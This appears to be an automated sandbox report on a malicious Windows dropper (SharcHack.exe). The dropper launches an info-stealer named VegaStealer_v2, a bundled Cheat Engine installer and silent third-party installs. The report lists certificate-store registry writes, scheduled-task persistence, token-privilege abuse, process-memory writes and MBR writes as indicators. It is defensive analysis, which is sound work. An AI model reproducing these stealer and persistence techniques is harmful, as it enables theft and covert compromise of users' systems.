0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e WeatherZero.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e WeatherZero.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 WeatherZero.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WeatherZero.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WeatherZero.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd CheatEngine75.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 CheatEngine75.tmp -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2196 schtasks.exe 1504 schtasks.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2656 v2.exe 2656 v2.exe 2656 v2.exe 2656 v2.exe 1660 3.exe 1660 3.exe 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 1520 powershell.exe 1660 3.exe 1660 3.exe 1660 3.exe 1660 3.exe 1660 3.exe 1660 3.exe 2276 powershell.exe 2804 CheatEngine75.tmp 1660 3.exe 1660 3.exe 2880 powershell.exe 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2804 CheatEngine75.tmp 2788 updater.exe 2788 updater.exe 2928 powershell.exe 2788 updater.exe 2788 updater.exe 2788 updater.exe 2788 updater.exe 2788 updater.exe 2788 updater.exe 2100 powershell.exe 2788 updater.exe 2788 updater.exe 2120 conhost.exe 2120 conhost.exe 2788 updater.exe 2788 updater.exe 2788 updater.exe 2788 updater.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe 1580 conhost.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 2656 v2.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeShutdownPrivilege 2744 powercfg.exe Token: SeShutdownPrivilege 2428 powercfg.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeShutdownPrivilege 2648 powercfg.exe Token: SeShutdownPrivilege 2692 powercfg.exe Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeShutdownPrivilege 2932 powercfg.exe Token: SeShutdownPrivilege 2152 powercfg.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeShutdownPrivilege 1028 powercfg.exe Token: SeShutdownPrivilege 1416 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 1564 WMIC.exe Token: SeIncreaseQuotaPrivilege 1564 WMIC.exe Token: SeSecurityPrivilege 1564 WMIC.exe Token: SeTakeOwnershipPrivilege 1564 WMIC.exe Token: SeLoadDriverPrivilege 1564 WMIC.exe Token: SeSystemtimePrivilege 1564 WMIC.exe Token: SeBackupPrivilege 1564 WMIC.exe Token: SeRestorePrivilege 1564 WMIC.exe Token: SeShutdownPrivilege 1564 WMIC.exe Token: SeSystemEnvironmentPrivilege 1564 WMIC.exe Token: SeUndockPrivilege 1564 WMIC.exe Token: SeManageVolumePrivilege 1564 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1564 WMIC.exe Token: SeIncreaseQuotaPrivilege 1564 WMIC.exe Token: SeSecurityPrivilege 1564 WMIC.exe Token: SeTakeOwnershipPrivilege 1564 WMIC.exe Token: SeLoadDriverPrivilege 1564 WMIC.exe Token: SeSystemtimePrivilege 1564 WMIC.exe Token: SeBackupPrivilege 1564 WMIC.exe Token: SeRestorePrivilege 1564 WMIC.exe Token: SeShutdownPrivilege 1564 WMIC.exe Token: SeSystemEnvironmentPrivilege 1564 WMIC.exe Token: SeUndockPrivilege 1564 WMIC.exe Token: SeManageVolumePrivilege 1564 WMIC.exe Token: SeLockMemoryPrivilege 1580 conhost.exe Token: 32 956 avast_free_antivirus_setup_online_x64.exe Token: SeDebugPrivilege 956 avast_free_antivirus_setup_online_x64.exe Token: 32 3016 instup.exe Token: SeDebugPrivilege 3016 instup.exe Token: SeTcbPrivilege 2656 WeatherZeroService.exe Token: SeDebugPrivilege 2660 instup.exe Token: 32 2660 instup.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2804 CheatEngine75.tmp 2912 CheatEngine75.tmp 780 cheatengine-x86_64-SSE4-AVX2.exe 2792 WeatherZero.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2792 WeatherZero.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1768 wrote to memory of 1660 1768 SharcHack.exe 30 PID 1768 wrote to memory of 1660 1768 SharcHack.exe 30 PID 1768 wrote to memory of 1660 1768 SharcHack.exe 30 PID 1768 wrote to memory of 1660 1768 SharcHack.exe 30 PID 1768 wrote to memory of 1872 1768 SharcHack.exe 31 PID 1768 wrote to memory of 1872 1768 SharcHack.exe 31 PID 1768 wrote to memory of 1872 1768 SharcHack.exe 31 PID 1768 wrote to memory of 1872 1768 SharcHack.exe 31 PID 1768 wrote to memory of 768 1768 SharcHack.exe 32 PID 1768 wrote to memory of 768 1768 SharcHack.exe 32 PID 1768 wrote to memory of 768 1768 SharcHack.exe 32 PID 1768 wrote to memory of 768 1768 SharcHack.exe 32 PID 1872 wrote to memory of 2656 1872 VegaStealer_v2.exe 33 PID 1872 wrote to memory of 2656 1872 VegaStealer_v2.exe 33 PID 1872 wrote to memory of 2656 1872 VegaStealer_v2.exe 33 PID 1872 wrote to memory of 2656 1872 VegaStealer_v2.exe 33 PID 768 wrote to memory of 2804 768 CheatEngine75.exe 34 PID 768 wrote to memory of 2804 768 CheatEngine75.exe 34 PID 768 wrote to memory of 2804 768 CheatEngine75.exe 34 PID 768 wrote to memory of 2804 768 CheatEngine75.exe 34 PID 768 wrote to memory of 2804 768 CheatEngine75.exe 34 PID 768 wrote to memory of 2804 768 CheatEngine75.exe 34 PID 768 wrote to memory of 2804 768 CheatEngine75.exe 34 PID 2712 wrote to memory of 2744 2712 cmd.exe 45 PID 2712 wrote to memory of 2744 2712 cmd.exe 45 PID 2712 wrote to memory of 2744 2712 cmd.exe 45 PID 1244 wrote to memory of 2660 1244 cmd.exe 46 PID 1244 wrote to memory of 2660 1244 cmd.exe 46 PID 1244 wrote to memory of 2660 1244 cmd.exe 46 PID 1244 wrote to memory of 2740 1244 cmd.exe 47 PID 1244 wrote to memory of 2740 1244 cmd.exe 47 PID 1244 wrote to memory of 2740 1244 cmd.exe 47 PID 2712 wrote to memory of 2428 2712 cmd.exe 48 PID 2712 wrote to memory of 2428 2712 cmd.exe 48 PID 2712 wrote to memory of 2428 2712 cmd.exe 48 PID 1244 wrote to memory of 1872 1244 cmd.exe 49 PID 1244 wrote to memory of 1872 1244 cmd.exe 49 PID 1244 wrote to memory of 1872 1244 cmd.exe 49 PID 2712 wrote to memory of 2648 2712 cmd.exe 50 PID 2712 wrote to memory of 2648 2712 cmd.exe 50 PID 2712 wrote to memory of 2648 2712 cmd.exe 50 PID 2712 wrote to memory of 2692 2712 cmd.exe 51 PID 2712 wrote to memory of 2692 2712 cmd.exe 51 PID 2712 wrote to memory of 2692 2712 cmd.exe 51 PID 1244 wrote to memory of 2668 1244 cmd.exe 52 PID 1244 wrote to memory of 2668 1244 cmd.exe 52 PID 1244 wrote to memory of 2668 1244 cmd.exe 52 PID 1244 wrote to memory of 2848 1244 cmd.exe 53 PID 1244 wrote to memory of 2848 1244 cmd.exe 53 PID 1244 wrote to memory of 2848 1244 cmd.exe 53 PID 1244 wrote to memory of 2608 1244 cmd.exe 54 PID 1244 wrote to memory of 2608 1244 cmd.exe 54 PID 1244 wrote to memory of 2608 1244 cmd.exe 54 PID 2276 wrote to memory of 2196 2276 powershell.exe 55 PID 2276 wrote to memory of 2196 2276 powershell.exe 55 PID 2276 wrote to memory of 2196 2276 powershell.exe 55 PID 1244 wrote to memory of 2180 1244 cmd.exe 56 PID 1244 wrote to memory of 2180 1244 cmd.exe 56 PID 1244 wrote to memory of 2180 1244 cmd.exe 56 PID 1244 wrote to memory of 2004 1244 cmd.exe 57 PID 1244 wrote to memory of 2004 1244 cmd.exe 57 PID 1244 wrote to memory of 2004 1244 cmd.exe 57 PID 1244 wrote to memory of 2768 1244 cmd.exe 58 PID 1244 wrote to memory of 2768 1244 cmd.exe 58 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\v2.exe"C:\Users\Admin\AppData\Local\Temp\v2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Users\Admin\AppData\Local\Temp\is-1UQH3.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-1UQH3.tmp\CheatEngine75.tmp" /SL5="$80150,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2804 -
C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod0_extract\WZSetup.exe"C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod0_extract\WZSetup.exe" /S /tpchannelid=1571 /distid=App1235⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:900 -
C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe"C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe" install6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1744
-
-
C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe"C:\Program Files (x86)\WeatherZero\WeatherZeroService.exe" start silent6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2560
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod1_extract\avg_secure_browser_setup.exe"C:\Users\Admin\AppData\Local\Temp\is-84G9R.tmp\prod1_extract\avg_secure_browser_setup.exe" /s /run_source=avg_ads_is_control /is_pixel_psh=BjYV6dOmC7Pu53CI2GVoQqIKY3UORBfPD5a5QdYE7R9gLhAgZ8KHj73WGvIUTLdf6R7Tg1fxc34Ql0B /make-default5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1056
-
-
